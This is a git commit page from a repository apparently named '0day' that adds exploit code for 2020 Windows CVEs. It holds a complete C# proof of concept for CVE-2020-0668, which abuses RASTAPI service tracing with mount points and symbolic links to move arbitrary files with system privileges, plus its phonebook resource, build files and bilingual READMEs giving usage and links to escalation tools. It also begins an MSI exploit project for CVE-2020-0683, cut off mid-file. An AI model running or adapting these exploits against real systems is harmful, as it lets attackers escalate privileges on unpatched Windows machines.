admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add several 2020 cve

Browse Source
This commit is contained in:
helloexp 2022-03-01 16:58:13 +08:00
parent 5940ce2a91
commit e91fbcdf96
245 changed files with 34005 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668.exe Normal file
View File

Binary file not shown.

6
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/App.config Normal file
View File

@ -0,0 +1,6 @@
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2" />
</startup>
</configuration>

71
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/CVE-2020-0668.csproj Normal file
View File

@ -0,0 +1,71 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{1B4C5EC1-2845-40FD-A173-62C450F12EA5}</ProjectGuid>
<OutputType>Exe</OutputType>
<RootNamespace>CVE_2020_0668</RootNamespace>
<AssemblyName>CVE-2020-0668</AssemblyName>
<TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
<Deterministic>true</Deterministic>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="NtApiDotNet, Version=1.0.0.0, Culture=neutral, processorArchitecture=MSIL">
<HintPath>packages\NtApiDotNet.1.1.27\lib\net45\NtApiDotNet.dll</HintPath>
</Reference>
<Reference Include="System" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Data" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Properties\AssemblyInfo.cs" />
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
</ItemGroup>
<ItemGroup>
<None Include="App.config" />
<None Include="packages.config" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Properties\Resources.resx">
<Generator>ResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<None Include="Resources\phonebook.txt" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
</Project>

25
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/CVE-2020-0668.sln Normal file
View File

@ -0,0 +1,25 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29806.167
MinimumVisualStudioVersion = 10.0.40219.1
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CVE-2020-0668", "CVE-2020-0668.csproj", "{1B4C5EC1-2845-40FD-A173-62C450F12EA5}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Debug|Any CPU.Build.0 = Debug|Any CPU
{1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Release|Any CPU.ActiveCfg = Release|Any CPU
{1B4C5EC1-2845-40FD-A173-62C450F12EA5}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {D31765F2-0CE6-4B07-9D34-58301467BB88}
EndGlobalSection
EndGlobal

104
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Program.cs Normal file
View File

@ -0,0 +1,104 @@
using NtApiDotNet;
using System;
using System.Threading;
using System.IO;
using Microsoft.Win32;
using System.Diagnostics;
//TODO actually get shells using https://github.com/itm4n/UsoDllLoader OR https://github.com/xct/diaghub
namespace CVE_2020_0668
{
class Program
{
static void Main(string[] args)
{
if (args.Length != 2)
{
Console.WriteLine("Use CVE-2020-0668 to perform an arbitrary privileged file move operation.");
Console.WriteLine($"Usage: inFilePath outFilePath");
return;
}
String inDLLPath = args[0];
String outDllPath = args[1];
if (!File.Exists(inDLLPath))
{
Console.WriteLine($@"[!] Cannot find {inDLLPath}!");
return;
}
Console.WriteLine(String.Format("[+] Moving {0} to {1}", inDLLPath, outDllPath));
String tempDirectory = GetTemporaryDirectory();
const string ObjectDirectory = @"\RPC Control";
Console.WriteLine($@"[+] Mounting {ObjectDirectory} onto {tempDirectory}");
string tempDirectoryNt = NtFileUtils.DosFileNameToNt(tempDirectory);
NtFile.CreateMountPoint(tempDirectoryNt, ObjectDirectory, "");
Console.WriteLine("[+] Creating symbol links");
var logFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.LOG", $@"\??\{inDLLPath}");
var oldFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.OLD", $@"\??\{outDllPath}");
Console.WriteLine(@"[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.");
Console.WriteLine(@"[+] Sleeping for 5 seconds so the changes take effect");
UpdateRASTAPITracingConfig(tempDirectory, true, 0x1000);
Thread.Sleep(5000); // might have to sleep for the update to take effect
string phonebookPath = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".pbk");
Console.WriteLine($"[+] Writing phonebook file to {phonebookPath}");
File.WriteAllText(phonebookPath, CVE_2020_0668.Properties.Resources.Phonebook);
using (Process p = new Process())
{
p.StartInfo.FileName = "rasdial";
p.StartInfo.Arguments = $@"VPNTEST test test /PHONEBOOK:{phonebookPath}";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.Start();
p.WaitForExit();
}
Console.WriteLine("[+] Cleaning up");
File.Delete(phonebookPath);
Directory.Delete(tempDirectory, true);
logFileSymlnk.Close();
oldFileSymlnk.Close();
UpdateRASTAPITracingConfig(@"%windir%\tracing", false, 0x100000); //those are the default values
Console.WriteLine("[+] Done!");
}
static public void UpdateRASTAPITracingConfig(string logDirectory, bool enabled, int logSize)
{
using (RegistryKey HKLocalMachine = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
{
using (RegistryKey key = HKLocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Tracing\RASTAPI", true))
{
if (key != null)
{
key.SetValue(@"FileDirectory", logDirectory);
key.SetValue(@"MaxFileSize", logSize);
key.SetValue(@"EnableFileTracing", enabled ? 1 : 0);
}
else
{
Console.WriteLine(@"[!] Failed to open HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI with write access!");
System.Environment.Exit(1);
}
}
}
}
static public string GetTemporaryDirectory()
{
string tempDirectory = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());
Directory.CreateDirectory(tempDirectory);
return tempDirectory;
}
}
}

36
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Properties/AssemblyInfo.cs Normal file
View File

@ -0,0 +1,36 @@
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("CVE-2020-0668")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("CVE-2020-0668")]
[assembly: AssemblyCopyright("Copyright © 2020")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("1b4c5ec1-2845-40fd-a173-62c450f12ea5")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

99
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Properties/Resources.Designer.cs generated Normal file
View File

@ -0,0 +1,99 @@
//------------------------------------------------------------------------------
// <auto-generated>
// This code was generated by a tool.
// Runtime Version:4.0.30319.42000
//
// Changes to this file may cause incorrect behavior and will be lost if
// the code is regenerated.
// </auto-generated>
//------------------------------------------------------------------------------
namespace CVE_2020_0668.Properties {
using System;
/// <summary>
/// A strongly-typed resource class, for looking up localized strings, etc.
/// </summary>
// This class was auto-generated by the StronglyTypedResourceBuilder
// class via a tool like ResGen or Visual Studio.
// To add or remove a member, edit your .ResX file then rerun ResGen
// with the /str option, or rebuild your VS project.
[global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
[global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
internal class Resources {
private static global::System.Resources.ResourceManager resourceMan;
private static global::System.Globalization.CultureInfo resourceCulture;
[global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
internal Resources() {
}
/// <summary>
/// Returns the cached ResourceManager instance used by this class.
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Resources.ResourceManager ResourceManager {
get {
if (object.ReferenceEquals(resourceMan, null)) {
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("CVE_2020_0668.Properties.Resources", typeof(Resources).Assembly);
resourceMan = temp;
}
return resourceMan;
}
}
/// <summary>
/// Overrides the current thread's CurrentUICulture property for all
/// resource lookups using this strongly typed resource class.
/// </summary>
[global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
internal static global::System.Globalization.CultureInfo Culture {
get {
return resourceCulture;
}
set {
resourceCulture = value;
}
}
/// <summary>
/// Looks up a localized string similar to [VPNTEST]
///Encoding=1
///PBVersion=1
///Type=2
///AutoLogon=1
///UseRasCredentials=1
///LowDateTime=-1345834320
///HighDateTime=30248544
///DialParamsUID=849441
///Guid=174463CE6AAFD4458FC57A466A95B787
///VpnStrategy=1
///ExcludedProtocols=0
///LcpExtensions=1
///DataEncryption=8
///SwCompression=0
///NegotiateMultilinkAlways=0
///SkipDoubleDialDialog=0
///DialMode=0
///OverridePref=15
///RedialAttempts=3
///RedialSeconds=60
///IdleDisconnectSeconds=0
///RedialOnLinkFailure=1
///CallbackMode=0
///CustomDialDll=
///CustomDialFunc=
///CustomRasDialDll=
///Forc [rest of string was truncated]&quot;;.
/// </summary>
internal static string Phonebook {
get {
return ResourceManager.GetString("Phonebook", resourceCulture);
}
}
}
}

124
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Properties/Resources.resx Normal file
View File

@ -0,0 +1,124 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<assembly alias="System.Windows.Forms" name="System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
<data name="Phonebook" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\Resources\phonebook.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252</value>
</data>
</root>

103
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/Resources/phonebook.txt Normal file
View File

@ -0,0 +1,103 @@
[VPNTEST]
Encoding=1
PBVersion=1
Type=2
AutoLogon=1
UseRasCredentials=1
LowDateTime=-1345834320
HighDateTime=30248544
DialParamsUID=849441
Guid=174463CE6AAFD4458FC57A466A95B787
VpnStrategy=1
ExcludedProtocols=0
LcpExtensions=1
DataEncryption=8
SwCompression=0
NegotiateMultilinkAlways=0
SkipDoubleDialDialog=0
DialMode=0
OverridePref=15
RedialAttempts=3
RedialSeconds=60
IdleDisconnectSeconds=0
RedialOnLinkFailure=1
CallbackMode=0
CustomDialDll=
CustomDialFunc=
CustomRasDialDll=
ForceSecureCompartment=0
DisableIKENameEkuCheck=0
AuthenticateServer=0
ShareMsFilePrint=1
BindMsNetClient=1
SharedPhoneNumbers=0
GlobalDeviceSettings=0
PrerequisiteEntry=
PrerequisitePbk=
PreferredPort=VPN3-0
PreferredDevice=WAN Miniport (PPTP)
PreferredBps=0
PreferredHwFlow=1
PreferredProtocol=1
PreferredCompression=1
PreferredSpeaker=1
PreferredMdmProtocol=0
PreviewUserPw=1
PreviewDomain=1
PreviewPhoneNumber=0
ShowDialingProgress=1
ShowMonitorIconInTaskBar=1
CustomAuthKey=0
AuthRestrictions=544
IpPrioritizeRemote=1
IpInterfaceMetric=0
IpHeaderCompression=0
IpAddress=0.0.0.0
IpDnsAddress=0.0.0.0
IpDns2Address=0.0.0.0
IpWinsAddress=0.0.0.0
IpWins2Address=0.0.0.0
IpAssign=1
IpNameAssign=1
IpDnsFlags=0
IpNBTFlags=1
TcpWindowSize=0
UseFlags=2
IpSecFlags=0
IpDnsSuffix=
Ipv6Assign=1
Ipv6Address=::
Ipv6PrefixLength=0
Ipv6PrioritizeRemote=1
Ipv6InterfaceMetric=0
Ipv6NameAssign=1
Ipv6DnsAddress=::
Ipv6Dns2Address=::
Ipv6Prefix=0000000000000000
Ipv6InterfaceId=0000000000000000
DisableClassBasedDefaultRoute=0
DisableMobility=0
NetworkOutageTime=0
ProvisionType=0
PreSharedKey=
NETCOMPONENTS=
ms_msclient=1
ms_server=1
MEDIA=rastapi
Port=VPN3-0
Device=WAN Miniport (PPTP)
DEVICE=vpn
PhoneNumber=127.0.0.1
AreaCode=
CountryCode=0
CountryID=0
UseDialingRules=0
Comment=
FriendlyName=
LastSelectedPhone=0
PromoteAlternates=0
TryNextAlternateOnFail=1

4
00-CVE_EXP/CVE-2020-0668/CVE-2020-0668/packages.config Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="NtApiDotNet" version="1.1.27" targetFramework="net472" />
</packages>

BIN
00-CVE_EXP/CVE-2020-0668/NtApiDotNet.dll Normal file
View File

Binary file not shown.

58
00-CVE_EXP/CVE-2020-0668/README.md Normal file
View File

@ -0,0 +1,58 @@
### CVE-2020-0668
#### 描述
Windows内核处理内存中对象的方式存在权限漏洞的提升
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1909 | | |
| Windows 10 | x64/x86/ARM64 | 1903 | | |
| Windows 10 | x64/x86/ARM64 | 1809 | | |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | &#10004; |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows 7 | x64/x86 | | SP1 | |
| Windows Server 2019 | | | | |
| Windows Server 2016 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server | | 1909 | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1803 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668
```
#### 利用方式
编译环境
- VS2019.NET Framework 4.7.2Any CPU Debug
该EXP是使用提权进行文件迁移操作如果想使用cmd需要自己修改代码测试机器Windows 10 1709 X64动图中是把**test.dll**移动到 `C:\Windows\System32`目录下,**test.dll**可以是任意文件。使用exe时需要把**NtApiDotNet.dll**文件放到同级目录
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif)
> Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation.
#### 分析文章
- https://www.anquanke.com/post/id/199011
- https://www.freebuf.com/vuls/227557.html
- https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/
#### 代码来源
- [RedCursorSecurityConsulting](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)

58
00-CVE_EXP/CVE-2020-0668/README_EN.md Normal file
View File

@ -0,0 +1,58 @@
### CVE-2020-0668
#### Describe
An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1909 | | |
| Windows 10 | x64/x86/ARM64 | 1903 | | |
| Windows 10 | x64/x86/ARM64 | 1809 | | |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | &#10004; |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows 7 | x64/x86 | | SP1 | |
| Windows Server 2019 | | | | |
| Windows Server 2016 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server | | 1909 | | |
| Windows Server | | 1903 | | |
| Windows Server | | 1803 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0668
```
#### Utilization
CompilerEnvironment
- VS2019.NET Framework 4.7.2Any CPU Debug
The exp is a file migration operation using rights, if you want to use CMD, you need to modify the code, test the machine Windows 10 1709 x64The moving map is moved to the `C:\Windows\System32` directory, **Test.dll** can be any file. Put the **ntapidotNet.dll** file in the same level when using EXE
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2020-0668_Windows_10_1709_X64.gif)
> Use https://github.com/itm4n/UsoDllLoader (Windows >= 1903) OR https://github.com/xct/diaghub (Windows < 1903) for privilege escalation.
#### Analyze
- https://www.anquanke.com/post/id/199011
- https://www.freebuf.com/vuls/227557.html
- https://itm4n.github.io/cve-2020-0668-windows-service-tracing-eop/
#### ProjectSource
- [RedCursorSecurityConsulting](https://github.com/RedCursorSecurityConsulting/CVE-2020-0668)

31
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit.sln Normal file
View File

@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio 15
VisualStudioVersion = 15.0.26730.8
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MsiExploit", "MsiExploit\MsiExploit.vcxproj", "{E75DCF6C-9B6D-49C8-96D7-0003C127B449}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.ActiveCfg = Debug|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x64.Build.0 = Debug|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.ActiveCfg = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Debug|x86.Build.0 = Debug|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.ActiveCfg = Release|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x64.Build.0 = Release|x64
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.ActiveCfg = Release|Win32
{E75DCF6C-9B6D-49C8-96D7-0003C127B449}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {AA32DEA9-85D3-447D-820E-C6ACA3AD0CBD}
EndGlobalSection
EndGlobal

204
00-CVE_EXP/CVE-2020-0683/CVE-2020-0683/MsiExploit/CommonUtils.cpp Normal file
View File

@ -0,0 +1,204 @@
// Copyright 2015 Google Inc. All Rights Reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http ://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "stdafx.h"
#include "CommonUtils.h"
#include <strsafe.h>
#include "ntimports.h"
void __stdcall my_puts(const char* str)
{
fwrite(str, 1, strlen(str), stdout);
}
static console_output _pout = my_puts;
void DebugSetOutput(console_output pout)
{
_pout = pout;
}
void DebugPrintf(const char* lpFormat, ...)
{
CHAR buf[1024];
va_list va;
va_start(va, lpFormat);
StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
_pout(buf);
}
std::wstring GetErrorMessage(DWORD dwError)
{
LPWSTR pBuffer = NULL;
DWORD dwSize = FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS |
FORMAT_MESSAGE_ALLOCATE_BUFFER, 0, dwError, 0, (LPWSTR)&pBuffer, 32 * 1024, nullptr);
if (dwSize > 0)
{
std::wstring ret = pBuffer;
LocalFree(pBuffer);
return ret;
}
else
{
printf("Error getting message %d\n", GetLastError());
WCHAR buf[64];
StringCchPrintf(buf, _countof(buf), L"%d", dwError);
return buf;
}
}
std::wstring GetErrorMessage()
{
return GetErrorMessage(GetLastError());
}
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &luid))
{
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
{
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
}
else
{
tp.Privileges[0].Attributes = 0;
}
if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
{
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
return FALSE;
}
return TRUE;
}
DWORD NtStatusToDosError(NTSTATUS status)
{
DEFINE_NTDLL(RtlNtStatusToDosError);
return fRtlNtStatusToDosError(status);
}
void SetNtLastError(NTSTATUS status)
{
SetLastError(NtStatusToDosError(status));
}
FARPROC GetProcAddressNT(LPCSTR lpName)
{
return GetProcAddress(GetModuleHandleW(L"ntdll"), lpName);
}
HANDLE OpenFileNative(LPCWSTR path, HANDLE root, ACCESS_MASK desired_access, ULONG share_access, ULONG open_options)
{
UNICODE_STRING name = { 0 };
OBJECT_ATTRIBUTES obj_attr = { 0 };
DEFINE_NTDLL(RtlInitUnicodeString);
DEFINE_NTDLL(NtOpenFile);
if (path)
{
fRtlInitUnicodeString(&name, path);
InitializeObjectAttributes(&obj_attr, &name, OBJ_CASE_INSENSITIVE, root, nullptr);
}
else
{
InitializeObjectAttributes(&obj_attr, nullptr, OBJ_CASE_INSENSITIVE, root, nullptr);
}
HANDLE h = nullptr;
IO_STATUS_BLOCK io_status = { 0 };
NTSTATUS status = fNtOpenFile(&h, desired_access, &obj_attr, &io_status, share_access, open_options);
if (NT_SUCCESS(status))
{
return h;
}
else
{
SetNtLastError(status);
return nullptr;
}
}
std::wstring BuildFullPath(const std::wstring& path, bool native)
{
std::wstring ret;
WCHAR buf[MAX_PATH];
if (native)
{
ret = L"\\??\\";
}
